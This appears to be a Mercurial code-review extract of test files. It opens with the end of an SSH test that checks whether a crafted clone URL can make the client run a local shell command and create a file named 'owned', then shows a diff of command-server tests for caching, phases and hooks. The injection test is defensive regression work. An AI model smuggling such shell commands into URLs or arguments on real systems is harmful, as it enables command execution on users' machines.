1153 $ hg clone "ssh://v-alid.example.com/" --debug
1154 running sh -c "read l; read l; read l" v-alid\.example\.com ['"]hg -R \. serve --stdio['"] (re)
1155 sending hello command
1156 sending between command
1157 abort: no suitable response from remote hg!
1158 [255]
1159
1160 We should not have created a file named owned - if it exists, the
1161 attack succeeded.
1162 $ if test -f owned; then echo 'you got owned'; fi
@@ -1,910 +1,987 b''
1 #if windows
1 #if windows
2 $ PYTHONPATH="$TESTDIR/../contrib;$PYTHONPATH"
2 $ PYTHONPATH="$TESTDIR/../contrib;$PYTHONPATH"
3 #else
3 #else
4 $ PYTHONPATH="$TESTDIR/../contrib:$PYTHONPATH"
4 $ PYTHONPATH="$TESTDIR/../contrib:$PYTHONPATH"
5 #endif
5 #endif
6 $ export PYTHONPATH
6 $ export PYTHONPATH
7
7
8 typical client does not want echo-back messages, so test without it:
8 typical client does not want echo-back messages, so test without it:
9
9
10 $ grep -v '^promptecho ' < $HGRCPATH >> $HGRCPATH.new
10 $ grep -v '^promptecho ' < $HGRCPATH >> $HGRCPATH.new
11 $ mv $HGRCPATH.new $HGRCPATH
11 $ mv $HGRCPATH.new $HGRCPATH
12
12
13 $ hg init repo
13 $ hg init repo
14 $ cd repo
14 $ cd repo
15
15
16 >>> from __future__ import print_function
16 >>> from __future__ import print_function
17 >>> from hgclient import readchannel, runcommand, check
17 >>> from hgclient import readchannel, runcommand, check
18 >>> @check
18 >>> @check
19 ... def hellomessage(server):
19 ... def hellomessage(server):
20 ... ch, data = readchannel(server)
20 ... ch, data = readchannel(server)
21 ... print('%c, %r' % (ch, data))
21 ... print('%c, %r' % (ch, data))
22 ... # run an arbitrary command to make sure the next thing the server
22 ... # run an arbitrary command to make sure the next thing the server
23 ... # sends isn't part of the hello message
23 ... # sends isn't part of the hello message
24 ... runcommand(server, ['id'])
24 ... runcommand(server, ['id'])
25 o, 'capabilities: getencoding runcommand\nencoding: *\npid: *' (glob)
25 o, 'capabilities: getencoding runcommand\nencoding: *\npid: *' (glob)
26 *** runcommand id
26 *** runcommand id
27 000000000000 tip
27 000000000000 tip
28
28
29 >>> from hgclient import check
29 >>> from hgclient import check
30 >>> @check
30 >>> @check
31 ... def unknowncommand(server):
31 ... def unknowncommand(server):
32 ... server.stdin.write('unknowncommand\n')
32 ... server.stdin.write('unknowncommand\n')
33 abort: unknown command unknowncommand
33 abort: unknown command unknowncommand
34
34
35 >>> from hgclient import readchannel, runcommand, check
35 >>> from hgclient import readchannel, runcommand, check
36 >>> @check
36 >>> @check
37 ... def checkruncommand(server):
37 ... def checkruncommand(server):
38 ... # hello block
38 ... # hello block
39 ... readchannel(server)
39 ... readchannel(server)
40 ...
40 ...
41 ... # no args
41 ... # no args
42 ... runcommand(server, [])
42 ... runcommand(server, [])
43 ...
43 ...
44 ... # global options
44 ... # global options
45 ... runcommand(server, ['id', '--quiet'])
45 ... runcommand(server, ['id', '--quiet'])
46 ...
46 ...
47 ... # make sure global options don't stick through requests
47 ... # make sure global options don't stick through requests
48 ... runcommand(server, ['id'])
48 ... runcommand(server, ['id'])
49 ...
49 ...
50 ... # --config
50 ... # --config
51 ... runcommand(server, ['id', '--config', 'ui.quiet=True'])
51 ... runcommand(server, ['id', '--config', 'ui.quiet=True'])
52 ...
52 ...
53 ... # make sure --config doesn't stick
53 ... # make sure --config doesn't stick
54 ... runcommand(server, ['id'])
54 ... runcommand(server, ['id'])
55 ...
55 ...
56 ... # negative return code should be masked
56 ... # negative return code should be masked
57 ... runcommand(server, ['id', '-runknown'])
57 ... runcommand(server, ['id', '-runknown'])
58 *** runcommand
58 *** runcommand
59 Mercurial Distributed SCM
59 Mercurial Distributed SCM
60
60
61 basic commands:
61 basic commands:
62
62
63 add add the specified files on the next commit
63 add add the specified files on the next commit
64 annotate show changeset information by line for each file
64 annotate show changeset information by line for each file
65 clone make a copy of an existing repository
65 clone make a copy of an existing repository
66 commit commit the specified files or all outstanding changes
66 commit commit the specified files or all outstanding changes
67 diff diff repository (or selected files)
67 diff diff repository (or selected files)
68 export dump the header and diffs for one or more changesets
68 export dump the header and diffs for one or more changesets
69 forget forget the specified files on the next commit
69 forget forget the specified files on the next commit
70 init create a new repository in the given directory
70 init create a new repository in the given directory
71 log show revision history of entire repository or files
71 log show revision history of entire repository or files
72 merge merge another revision into working directory
72 merge merge another revision into working directory
73 pull pull changes from the specified source
73 pull pull changes from the specified source
74 push push changes to the specified destination
74 push push changes to the specified destination
75 remove remove the specified files on the next commit
75 remove remove the specified files on the next commit
76 serve start stand-alone webserver
76 serve start stand-alone webserver
77 status show changed files in the working directory
77 status show changed files in the working directory
78 summary summarize working directory state
78 summary summarize working directory state
79 update update working directory (or switch revisions)
79 update update working directory (or switch revisions)
80
80
81 (use 'hg help' for the full list of commands or 'hg -v' for details)
81 (use 'hg help' for the full list of commands or 'hg -v' for details)
82 *** runcommand id --quiet
82 *** runcommand id --quiet
83 000000000000
83 000000000000
84 *** runcommand id
84 *** runcommand id
85 000000000000 tip
85 000000000000 tip
86 *** runcommand id --config ui.quiet=True
86 *** runcommand id --config ui.quiet=True
87 000000000000
87 000000000000
88 *** runcommand id
88 *** runcommand id
89 000000000000 tip
89 000000000000 tip
90 *** runcommand id -runknown
90 *** runcommand id -runknown
91 abort: unknown revision 'unknown'!
91 abort: unknown revision 'unknown'!
92 [255]
92 [255]
93
93
94 >>> from hgclient import readchannel, check
94 >>> from hgclient import readchannel, check
95 >>> @check
95 >>> @check
96 ... def inputeof(server):
96 ... def inputeof(server):
97 ... readchannel(server)
97 ... readchannel(server)
98 ... server.stdin.write('runcommand\n')
98 ... server.stdin.write('runcommand\n')
99 ... # close stdin while server is waiting for input
99 ... # close stdin while server is waiting for input
100 ... server.stdin.close()
100 ... server.stdin.close()
101 ...
101 ...
102 ... # server exits with 1 if the pipe closed while reading the command
102 ... # server exits with 1 if the pipe closed while reading the command
103 ... print('server exit code =', server.wait())
103 ... print('server exit code =', server.wait())
104 server exit code = 1
104 server exit code = 1
105
105
106 >>> from hgclient import readchannel, runcommand, check, stringio
106 >>> from hgclient import readchannel, runcommand, check, stringio
107 >>> @check
107 >>> @check
108 ... def serverinput(server):
108 ... def serverinput(server):
109 ... readchannel(server)
109 ... readchannel(server)
110 ...
110 ...
111 ... patch = """
111 ... patch = """
112 ... # HG changeset patch
112 ... # HG changeset patch
113 ... # User test
113 ... # User test
114 ... # Date 0 0
114 ... # Date 0 0
115 ... # Node ID c103a3dec114d882c98382d684d8af798d09d857
115 ... # Node ID c103a3dec114d882c98382d684d8af798d09d857
116 ... # Parent 0000000000000000000000000000000000000000
116 ... # Parent 0000000000000000000000000000000000000000
117 ... 1
117 ... 1
118 ...
118 ...
119 ... diff -r 000000000000 -r c103a3dec114 a
119 ... diff -r 000000000000 -r c103a3dec114 a
120 ... --- /dev/null Thu Jan 01 00:00:00 1970 +0000
120 ... --- /dev/null Thu Jan 01 00:00:00 1970 +0000
121 ... +++ b/a Thu Jan 01 00:00:00 1970 +0000
121 ... +++ b/a Thu Jan 01 00:00:00 1970 +0000
122 ... @@ -0,0 +1,1 @@
122 ... @@ -0,0 +1,1 @@
123 ... +1
123 ... +1
124 ... """
124 ... """
125 ...
125 ...
126 ... runcommand(server, ['import', '-'], input=stringio(patch))
126 ... runcommand(server, ['import', '-'], input=stringio(patch))
127 ... runcommand(server, ['log'])
127 ... runcommand(server, ['log'])
128 *** runcommand import -
128 *** runcommand import -
129 applying patch from stdin
129 applying patch from stdin
130 *** runcommand log
130 *** runcommand log
131 changeset: 0:eff892de26ec
131 changeset: 0:eff892de26ec
132 tag: tip
132 tag: tip
133 user: test
133 user: test
134 date: Thu Jan 01 00:00:00 1970 +0000
134 date: Thu Jan 01 00:00:00 1970 +0000
135 summary: 1
135 summary: 1
136
136
137
137
138 check that "histedit --commands=-" can read rules from the input channel:
138 check that "histedit --commands=-" can read rules from the input channel:
139
139
140 >>> import cStringIO
140 >>> import cStringIO
141 >>> from hgclient import readchannel, runcommand, check
141 >>> from hgclient import readchannel, runcommand, check
142 >>> @check
142 >>> @check
143 ... def serverinput(server):
143 ... def serverinput(server):
144 ... readchannel(server)
144 ... readchannel(server)
145 ... rules = 'pick eff892de26ec\n'
145 ... rules = 'pick eff892de26ec\n'
146 ... runcommand(server, ['histedit', '0', '--commands=-',
146 ... runcommand(server, ['histedit', '0', '--commands=-',
147 ... '--config', 'extensions.histedit='],
147 ... '--config', 'extensions.histedit='],
148 ... input=cStringIO.StringIO(rules))
148 ... input=cStringIO.StringIO(rules))
149 *** runcommand histedit 0 --commands=- --config extensions.histedit=
149 *** runcommand histedit 0 --commands=- --config extensions.histedit=
150
150
151 check that --cwd doesn't persist between requests:
151 check that --cwd doesn't persist between requests:
152
152
153 $ mkdir foo
153 $ mkdir foo
154 $ touch foo/bar
154 $ touch foo/bar
155 >>> from hgclient import readchannel, runcommand, check
155 >>> from hgclient import readchannel, runcommand, check
156 >>> @check
156 >>> @check
157 ... def cwd(server):
157 ... def cwd(server):
158 ... readchannel(server)
158 ... readchannel(server)
159 ... runcommand(server, ['--cwd', 'foo', 'st', 'bar'])
159 ... runcommand(server, ['--cwd', 'foo', 'st', 'bar'])
160 ... runcommand(server, ['st', 'foo/bar'])
160 ... runcommand(server, ['st', 'foo/bar'])
161 *** runcommand --cwd foo st bar
161 *** runcommand --cwd foo st bar
162 ? bar
162 ? bar
163 *** runcommand st foo/bar
163 *** runcommand st foo/bar
164 ? foo/bar
164 ? foo/bar
165
165
166 $ rm foo/bar
166 $ rm foo/bar
167
167
168
168
169 check that local configs for the cached repo aren't inherited when -R is used:
169 check that local configs for the cached repo aren't inherited when -R is used:
170
170
171 $ cat <<EOF >> .hg/hgrc
171 $ cat <<EOF >> .hg/hgrc
172 > [ui]
172 > [ui]
173 > foo = bar
173 > foo = bar
174 > EOF
174 > EOF
175
175
176 >>> from hgclient import readchannel, sep, runcommand, check
176 >>> from hgclient import readchannel, sep, runcommand, check
177 >>> @check
177 >>> @check
178 ... def localhgrc(server):
178 ... def localhgrc(server):
179 ... readchannel(server)
179 ... readchannel(server)
180 ...
180 ...
181 ... # the cached repo local hgrc contains ui.foo=bar, so showconfig should
181 ... # the cached repo local hgrc contains ui.foo=bar, so showconfig should
182 ... # show it
182 ... # show it
183 ... runcommand(server, ['showconfig'], outfilter=sep)
183 ... runcommand(server, ['showconfig'], outfilter=sep)
184 ...
184 ...
185 ... # but not for this repo
185 ... # but not for this repo
186 ... runcommand(server, ['init', 'foo'])
186 ... runcommand(server, ['init', 'foo'])
187 ... runcommand(server, ['-R', 'foo', 'showconfig', 'ui', 'defaults'])
187 ... runcommand(server, ['-R', 'foo', 'showconfig', 'ui', 'defaults'])
188 *** runcommand showconfig
188 *** runcommand showconfig
189 bundle.mainreporoot=$TESTTMP/repo
189 bundle.mainreporoot=$TESTTMP/repo
190 devel.all-warnings=true
190 devel.all-warnings=true
191 devel.default-date=0 0
191 devel.default-date=0 0
192 extensions.fsmonitor= (fsmonitor !)
192 extensions.fsmonitor= (fsmonitor !)
193 largefiles.usercache=$TESTTMP/.cache/largefiles
193 largefiles.usercache=$TESTTMP/.cache/largefiles
194 ui.slash=True
194 ui.slash=True
195 ui.interactive=False
195 ui.interactive=False
196 ui.mergemarkers=detailed
196 ui.mergemarkers=detailed
197 ui.usehttp2=true (?)
197 ui.usehttp2=true (?)
198 ui.foo=bar
198 ui.foo=bar
199 ui.nontty=true
199 ui.nontty=true
200 web.address=localhost
200 web.address=localhost
201 web\.ipv6=(?:True|False) (re)
201 web\.ipv6=(?:True|False) (re)
202 *** runcommand init foo
202 *** runcommand init foo
203 *** runcommand -R foo showconfig ui defaults
203 *** runcommand -R foo showconfig ui defaults
204 ui.slash=True
204 ui.slash=True
205 ui.interactive=False
205 ui.interactive=False
206 ui.mergemarkers=detailed
206 ui.mergemarkers=detailed
207 ui.usehttp2=true (?)
207 ui.usehttp2=true (?)
208 ui.nontty=true
208 ui.nontty=true
209
209
210 $ rm -R foo
210 $ rm -R foo
211
211
212 #if windows
212 #if windows
213 $ PYTHONPATH="$TESTTMP/repo;$PYTHONPATH"
213 $ PYTHONPATH="$TESTTMP/repo;$PYTHONPATH"
214 #else
214 #else
215 $ PYTHONPATH="$TESTTMP/repo:$PYTHONPATH"
215 $ PYTHONPATH="$TESTTMP/repo:$PYTHONPATH"
216 #endif
216 #endif
217
217
218 $ cat <<EOF > hook.py
218 $ cat <<EOF > hook.py
219 > from __future__ import print_function
219 > from __future__ import print_function
220 > import sys
220 > import sys
221 > def hook(**args):
221 > def hook(**args):
222 > print('hook talking')
222 > print('hook talking')
223 > print('now try to read something: %r' % sys.stdin.read())
223 > print('now try to read something: %r' % sys.stdin.read())
224 > EOF
224 > EOF
225
225
226 >>> from hgclient import readchannel, runcommand, check, stringio
226 >>> from hgclient import readchannel, runcommand, check, stringio
227 >>> @check
227 >>> @check
228 ... def hookoutput(server):
228 ... def hookoutput(server):
229 ... readchannel(server)
229 ... readchannel(server)
230 ... runcommand(server, ['--config',
230 ... runcommand(server, ['--config',
231 ... 'hooks.pre-identify=python:hook.hook',
231 ... 'hooks.pre-identify=python:hook.hook',
232 ... 'id'],
232 ... 'id'],
233 ... input=stringio('some input'))
233 ... input=stringio('some input'))
234 *** runcommand --config hooks.pre-identify=python:hook.hook id
234 *** runcommand --config hooks.pre-identify=python:hook.hook id
235 eff892de26ec tip
235 eff892de26ec tip
236
236
237 Clean hook cached version
237 Clean hook cached version
238 $ rm hook.py*
238 $ rm hook.py*
239 $ rm -Rf __pycache__
239 $ rm -Rf __pycache__
240
240
241 $ echo a >> a
241 $ echo a >> a
242 >>> import os
242 >>> import os
243 >>> from hgclient import readchannel, runcommand, check
243 >>> from hgclient import readchannel, runcommand, check
244 >>> @check
244 >>> @check
245 ... def outsidechanges(server):
245 ... def outsidechanges(server):
246 ... readchannel(server)
246 ... readchannel(server)
247 ... runcommand(server, ['status'])
247 ... runcommand(server, ['status'])
248 ... os.system('hg ci -Am2')
248 ... os.system('hg ci -Am2')
249 ... runcommand(server, ['tip'])
249 ... runcommand(server, ['tip'])
250 ... runcommand(server, ['status'])
250 ... runcommand(server, ['status'])
251 *** runcommand status
251 *** runcommand status
252 M a
252 M a
253 *** runcommand tip
253 *** runcommand tip
254 changeset: 1:d3a0a68be6de
254 changeset: 1:d3a0a68be6de
255 tag: tip
255 tag: tip
256 user: test
256 user: test
257 date: Thu Jan 01 00:00:00 1970 +0000
257 date: Thu Jan 01 00:00:00 1970 +0000
258 summary: 2
258 summary: 2
259
259
260 *** runcommand status
260 *** runcommand status
261
261
262 >>> import os
262 >>> import os
263 >>> from hgclient import readchannel, runcommand, check
263 >>> from hgclient import readchannel, runcommand, check
264 >>> @check
264 >>> @check
265 ... def bookmarks(server):
265 ... def bookmarks(server):
266 ... readchannel(server)
266 ... readchannel(server)
267 ... runcommand(server, ['bookmarks'])
267 ... runcommand(server, ['bookmarks'])
268 ...
268 ...
269 ... # changes .hg/bookmarks
269 ... # changes .hg/bookmarks
270 ... os.system('hg bookmark -i bm1')
270 ... os.system('hg bookmark -i bm1')
271 ... os.system('hg bookmark -i bm2')
271 ... os.system('hg bookmark -i bm2')
272 ... runcommand(server, ['bookmarks'])
272 ... runcommand(server, ['bookmarks'])
273 ...
273 ...
274 ... # changes .hg/bookmarks.current
274 ... # changes .hg/bookmarks.current
275 ... os.system('hg upd bm1 -q')
275 ... os.system('hg upd bm1 -q')
276 ... runcommand(server, ['bookmarks'])
276 ... runcommand(server, ['bookmarks'])
277 ...
277 ...
278 ... runcommand(server, ['bookmarks', 'bm3'])
278 ... runcommand(server, ['bookmarks', 'bm3'])
279 ... f = open('a', 'ab')
279 ... f = open('a', 'ab')
280 ... f.write('a\n')
280 ... f.write('a\n')
281 ... f.close()
281 ... f.close()
282 ... runcommand(server, ['commit', '-Amm'])
282 ... runcommand(server, ['commit', '-Amm'])
283 ... runcommand(server, ['bookmarks'])
283 ... runcommand(server, ['bookmarks'])
284 *** runcommand bookmarks
284 *** runcommand bookmarks
285 no bookmarks set
285 no bookmarks set
286 *** runcommand bookmarks
286 *** runcommand bookmarks
287 bm1 1:d3a0a68be6de
287 bm1 1:d3a0a68be6de
288 bm2 1:d3a0a68be6de
288 bm2 1:d3a0a68be6de
289 *** runcommand bookmarks
289 *** runcommand bookmarks
290 * bm1 1:d3a0a68be6de
290 * bm1 1:d3a0a68be6de
291 bm2 1:d3a0a68be6de
291 bm2 1:d3a0a68be6de
292 *** runcommand bookmarks bm3
292 *** runcommand bookmarks bm3
293 *** runcommand commit -Amm
293 *** runcommand commit -Amm
294 *** runcommand bookmarks
294 *** runcommand bookmarks
295 bm1 1:d3a0a68be6de
295 bm1 1:d3a0a68be6de
296 bm2 1:d3a0a68be6de
296 bm2 1:d3a0a68be6de
297 * bm3 2:aef17e88f5f0
297 * bm3 2:aef17e88f5f0
298
298
299 >>> import os
299 >>> import os
300 >>> from hgclient import readchannel, runcommand, check
300 >>> from hgclient import readchannel, runcommand, check
301 >>> @check
301 >>> @check
302 ... def tagscache(server):
302 ... def tagscache(server):
303 ... readchannel(server)
303 ... readchannel(server)
304 ... runcommand(server, ['id', '-t', '-r', '0'])
304 ... runcommand(server, ['id', '-t', '-r', '0'])
305 ... os.system('hg tag -r 0 foo')
305 ... os.system('hg tag -r 0 foo')
306 ... runcommand(server, ['id', '-t', '-r', '0'])
306 ... runcommand(server, ['id', '-t', '-r', '0'])
307 *** runcommand id -t -r 0
307 *** runcommand id -t -r 0
308
308
309 *** runcommand id -t -r 0
309 *** runcommand id -t -r 0
310 foo
310 foo
311
311
312 >>> import os
312 >>> import os
313 >>> from hgclient import readchannel, runcommand, check
313 >>> from hgclient import readchannel, runcommand, check
314 >>> @check
314 >>> @check
315 ... def setphase(server):
315 ... def setphase(server):
316 ... readchannel(server)
316 ... readchannel(server)
317 ... runcommand(server, ['phase', '-r', '.'])
317 ... runcommand(server, ['phase', '-r', '.'])
318 ... os.system('hg phase -r . -p')
318 ... os.system('hg phase -r . -p')
319 ... runcommand(server, ['phase', '-r', '.'])
319 ... runcommand(server, ['phase', '-r', '.'])
320 *** runcommand phase -r .
320 *** runcommand phase -r .
321 3: draft
321 3: draft
322 *** runcommand phase -r .
322 *** runcommand phase -r .
323 3: public
323 3: public
324
324
325 $ echo a >> a
325 $ echo a >> a
326 >>> from hgclient import readchannel, runcommand, check
326 >>> from hgclient import readchannel, runcommand, check
327 >>> @check
327 >>> @check
328 ... def rollback(server):
328 ... def rollback(server):
329 ... readchannel(server)
329 ... readchannel(server)
330 ... runcommand(server, ['phase', '-r', '.', '-p'])
330 ... runcommand(server, ['phase', '-r', '.', '-p'])
331 ... runcommand(server, ['commit', '-Am.'])
331 ... runcommand(server, ['commit', '-Am.'])
332 ... runcommand(server, ['rollback'])
332 ... runcommand(server, ['rollback'])
333 ... runcommand(server, ['phase', '-r', '.'])
333 ... runcommand(server, ['phase', '-r', '.'])
334 *** runcommand phase -r . -p
334 *** runcommand phase -r . -p
335 no phases changed
335 no phases changed
336 *** runcommand commit -Am.
336 *** runcommand commit -Am.
337 *** runcommand rollback
337 *** runcommand rollback
338 repository tip rolled back to revision 3 (undo commit)
338 repository tip rolled back to revision 3 (undo commit)
339 working directory now based on revision 3
339 working directory now based on revision 3
340 *** runcommand phase -r .
340 *** runcommand phase -r .
341 3: public
341 3: public
342
342
343 >>> import os
343 >>> import os
344 >>> from hgclient import readchannel, runcommand, check
344 >>> from hgclient import readchannel, runcommand, check
345 >>> @check
345 >>> @check
346 ... def branch(server):
346 ... def branch(server):
347 ... readchannel(server)
347 ... readchannel(server)
348 ... runcommand(server, ['branch'])
348 ... runcommand(server, ['branch'])
349 ... os.system('hg branch foo')
349 ... os.system('hg branch foo')
350 ... runcommand(server, ['branch'])
350 ... runcommand(server, ['branch'])
351 ... os.system('hg branch default')
351 ... os.system('hg branch default')
352 *** runcommand branch
352 *** runcommand branch
353 default
353 default
354 marked working directory as branch foo
354 marked working directory as branch foo
355 (branches are permanent and global, did you want a bookmark?)
355 (branches are permanent and global, did you want a bookmark?)
356 *** runcommand branch
356 *** runcommand branch
357 foo
357 foo
358 marked working directory as branch default
358 marked working directory as branch default
359 (branches are permanent and global, did you want a bookmark?)
359 (branches are permanent and global, did you want a bookmark?)
360
360
361 $ touch .hgignore
361 $ touch .hgignore
362 >>> import os
362 >>> import os
363 >>> from hgclient import readchannel, runcommand, check
363 >>> from hgclient import readchannel, runcommand, check
364 >>> @check
364 >>> @check
365 ... def hgignore(server):
365 ... def hgignore(server):
366 ... readchannel(server)
366 ... readchannel(server)
367 ... runcommand(server, ['commit', '-Am.'])
367 ... runcommand(server, ['commit', '-Am.'])
368 ... f = open('ignored-file', 'ab')
368 ... f = open('ignored-file', 'ab')
369 ... f.write('')
369 ... f.write('')
370 ... f.close()
370 ... f.close()
371 ... f = open('.hgignore', 'ab')
371 ... f = open('.hgignore', 'ab')
372 ... f.write('ignored-file')
372 ... f.write('ignored-file')
373 ... f.close()
373 ... f.close()
374 ... runcommand(server, ['status', '-i', '-u'])
374 ... runcommand(server, ['status', '-i', '-u'])
375 *** runcommand commit -Am.
375 *** runcommand commit -Am.
376 adding .hgignore
376 adding .hgignore
377 *** runcommand status -i -u
377 *** runcommand status -i -u
378 I ignored-file
378 I ignored-file
379
379
380 cache of non-public revisions should be invalidated on repository change
380 cache of non-public revisions should be invalidated on repository change
381 (issue4855):
381 (issue4855):
382
382
383 >>> import os
383 >>> import os
384 >>> from hgclient import readchannel, runcommand, check
384 >>> from hgclient import readchannel, runcommand, check
385 >>> @check
385 >>> @check
386 ... def phasesetscacheaftercommit(server):
386 ... def phasesetscacheaftercommit(server):
387 ... readchannel(server)
387 ... readchannel(server)
388 ... # load _phasecache._phaserevs and _phasesets
388 ... # load _phasecache._phaserevs and _phasesets
389 ... runcommand(server, ['log', '-qr', 'draft()'])
389 ... runcommand(server, ['log', '-qr', 'draft()'])
390 ... # create draft commits by another process
390 ... # create draft commits by another process
391 ... for i in xrange(5, 7):
391 ... for i in xrange(5, 7):
392 ... f = open('a', 'ab')
392 ... f = open('a', 'ab')
393 ... f.seek(0, os.SEEK_END)
393 ... f.seek(0, os.SEEK_END)
394 ... f.write('a\n')
394 ... f.write('a\n')
395 ... f.close()
395 ... f.close()
396 ... os.system('hg commit -Aqm%d' % i)
396 ... os.system('hg commit -Aqm%d' % i)
397 ... # new commits should be listed as draft revisions
397 ... # new commits should be listed as draft revisions
398 ... runcommand(server, ['log', '-qr', 'draft()'])
398 ... runcommand(server, ['log', '-qr', 'draft()'])
399 *** runcommand log -qr draft()
399 *** runcommand log -qr draft()
400 4:7966c8e3734d
400 4:7966c8e3734d
401 *** runcommand log -qr draft()
401 *** runcommand log -qr draft()
402 4:7966c8e3734d
402 4:7966c8e3734d
403 5:41f6602d1c4f
403 5:41f6602d1c4f
404 6:10501e202c35
404 6:10501e202c35
405
405
406 >>> import os
406 >>> import os
407 >>> from hgclient import readchannel, runcommand, check
407 >>> from hgclient import readchannel, runcommand, check
408 >>> @check
408 >>> @check
409 ... def phasesetscacheafterstrip(server):
409 ... def phasesetscacheafterstrip(server):
410 ... readchannel(server)
410 ... readchannel(server)
411 ... # load _phasecache._phaserevs and _phasesets
411 ... # load _phasecache._phaserevs and _phasesets
412 ... runcommand(server, ['log', '-qr', 'draft()'])
412 ... runcommand(server, ['log', '-qr', 'draft()'])
413 ... # strip cached revisions by another process
413 ... # strip cached revisions by another process
414 ... os.system('hg --config extensions.strip= strip -q 5')
414 ... os.system('hg --config extensions.strip= strip -q 5')
415 ... # shouldn't abort by "unknown revision '6'"
415 ... # shouldn't abort by "unknown revision '6'"
416 ... runcommand(server, ['log', '-qr', 'draft()'])
416 ... runcommand(server, ['log', '-qr', 'draft()'])
417 *** runcommand log -qr draft()
417 *** runcommand log -qr draft()
418 4:7966c8e3734d
418 4:7966c8e3734d
419 5:41f6602d1c4f
419 5:41f6602d1c4f
420 6:10501e202c35
420 6:10501e202c35
421 *** runcommand log -qr draft()
421 *** runcommand log -qr draft()
422 4:7966c8e3734d
422 4:7966c8e3734d
423
423
424 cache of phase roots should be invalidated on strip (issue3827):
424 cache of phase roots should be invalidated on strip (issue3827):
425
425
426 >>> import os
426 >>> import os
427 >>> from hgclient import readchannel, sep, runcommand, check
427 >>> from hgclient import readchannel, sep, runcommand, check
428 >>> @check
428 >>> @check
429 ... def phasecacheafterstrip(server):
429 ... def phasecacheafterstrip(server):
430 ... readchannel(server)
430 ... readchannel(server)
431 ...
431 ...
432 ... # create new head, 5:731265503d86
432 ... # create new head, 5:731265503d86
433 ... runcommand(server, ['update', '-C', '0'])
433 ... runcommand(server, ['update', '-C', '0'])
434 ... f = open('a', 'ab')
434 ... f = open('a', 'ab')
435 ... f.write('a\n')
435 ... f.write('a\n')
436 ... f.close()
436 ... f.close()
437 ... runcommand(server, ['commit', '-Am.', 'a'])
437 ... runcommand(server, ['commit', '-Am.', 'a'])
438 ... runcommand(server, ['log', '-Gq'])
438 ... runcommand(server, ['log', '-Gq'])
439 ...
439 ...
440 ... # make it public; draft marker moves to 4:7966c8e3734d
440 ... # make it public; draft marker moves to 4:7966c8e3734d
441 ... runcommand(server, ['phase', '-p', '.'])
441 ... runcommand(server, ['phase', '-p', '.'])
442 ... # load _phasecache.phaseroots
442 ... # load _phasecache.phaseroots
443 ... runcommand(server, ['phase', '.'], outfilter=sep)
443 ... runcommand(server, ['phase', '.'], outfilter=sep)
444 ...
444 ...
445 ... # strip 1::4 outside server
445 ... # strip 1::4 outside server
446 ... os.system('hg -q --config extensions.mq= strip 1')
446 ... os.system('hg -q --config extensions.mq= strip 1')
447 ...
447 ...
448 ... # shouldn't raise "7966c8e3734d: no node!"
448 ... # shouldn't raise "7966c8e3734d: no node!"
449 ... runcommand(server, ['branches'])
449 ... runcommand(server, ['branches'])
450 *** runcommand update -C 0
450 *** runcommand update -C 0
451 1 files updated, 0 files merged, 2 files removed, 0 files unresolved
451 1 files updated, 0 files merged, 2 files removed, 0 files unresolved
452 (leaving bookmark bm3)
452 (leaving bookmark bm3)
453 *** runcommand commit -Am. a
453 *** runcommand commit -Am. a
454 created new head
454 created new head
455 *** runcommand log -Gq
455 *** runcommand log -Gq
456 @ 5:731265503d86
456 @ 5:731265503d86
457 |
457 |
458 | o 4:7966c8e3734d
458 | o 4:7966c8e3734d
459 | |
459 | |
460 | o 3:b9b85890c400
460 | o 3:b9b85890c400
461 | |
461 | |
462 | o 2:aef17e88f5f0
462 | o 2:aef17e88f5f0
463 | |
463 | |
464 | o 1:d3a0a68be6de
464 | o 1:d3a0a68be6de
465 |/
465 |/
466 o 0:eff892de26ec
466 o 0:eff892de26ec
467
467
468 *** runcommand phase -p .
468 *** runcommand phase -p .
469 *** runcommand phase .
469 *** runcommand phase .
470 5: public
470 5: public
471 *** runcommand branches
471 *** runcommand branches
472 default 1:731265503d86
472 default 1:731265503d86
473
473
474 in-memory cache must be reloaded if transaction is aborted. otherwise
474 in-memory cache must be reloaded if transaction is aborted. otherwise
475 changelog and manifest would have invalid node:
475 changelog and manifest would have invalid node:
476
476
477 $ echo a >> a
477 $ echo a >> a
478 >>> from hgclient import readchannel, runcommand, check
478 >>> from hgclient import readchannel, runcommand, check
479 >>> @check
479 >>> @check
480 ... def txabort(server):
480 ... def txabort(server):
481 ... readchannel(server)
481 ... readchannel(server)
482 ... runcommand(server, ['commit', '--config', 'hooks.pretxncommit=false',
482 ... runcommand(server, ['commit', '--config', 'hooks.pretxncommit=false',
483 ... '-mfoo'])
483 ... '-mfoo'])
484 ... runcommand(server, ['verify'])
484 ... runcommand(server, ['verify'])
485 *** runcommand commit --config hooks.pretxncommit=false -mfoo
485 *** runcommand commit --config hooks.pretxncommit=false -mfoo
486 transaction abort!
486 transaction abort!
487 rollback completed
487 rollback completed
488 abort: pretxncommit hook exited with status 1
488 abort: pretxncommit hook exited with status 1
489 [255]
489 [255]
490 *** runcommand verify
490 *** runcommand verify
491 checking changesets
491 checking changesets
492 checking manifests
492 checking manifests
493 crosschecking files in changesets and manifests
493 crosschecking files in changesets and manifests
494 checking files
494 checking files
495 1 files, 2 changesets, 2 total revisions
495 1 files, 2 changesets, 2 total revisions
496 $ hg revert --no-backup -aq
496 $ hg revert --no-backup -aq
497
497
498 $ cat >> .hg/hgrc << EOF
498 $ cat >> .hg/hgrc << EOF
499 > [experimental]
499 > [experimental]
500 > evolution=createmarkers
500 > evolution=createmarkers
501 > EOF
501 > EOF
502
502
503 >>> import os
503 >>> import os
504 >>> from hgclient import readchannel, runcommand, check
504 >>> from hgclient import readchannel, runcommand, check
505 >>> @check
505 >>> @check
506 ... def obsolete(server):
506 ... def obsolete(server):
507 ... readchannel(server)
507 ... readchannel(server)
508 ...
508 ...
509 ... runcommand(server, ['up', 'null'])
509 ... runcommand(server, ['up', 'null'])
510 ... runcommand(server, ['phase', '-df', 'tip'])
510 ... runcommand(server, ['phase', '-df', 'tip'])
511 ... cmd = 'hg debugobsolete `hg log -r tip --template {node}`'
511 ... cmd = 'hg debugobsolete `hg log -r tip --template {node}`'
512 ... if os.name == 'nt':
512 ... if os.name == 'nt':
513 ... cmd = 'sh -c "%s"' % cmd # run in sh, not cmd.exe
513 ... cmd = 'sh -c "%s"' % cmd # run in sh, not cmd.exe
514 ... os.system(cmd)
514 ... os.system(cmd)
515 ... runcommand(server, ['log', '--hidden'])
515 ... runcommand(server, ['log', '--hidden'])
516 ... runcommand(server, ['log'])
516 ... runcommand(server, ['log'])
517 *** runcommand up null
517 *** runcommand up null
518 0 files updated, 0 files merged, 1 files removed, 0 files unresolved
518 0 files updated, 0 files merged, 1 files removed, 0 files unresolved
519 *** runcommand phase -df tip
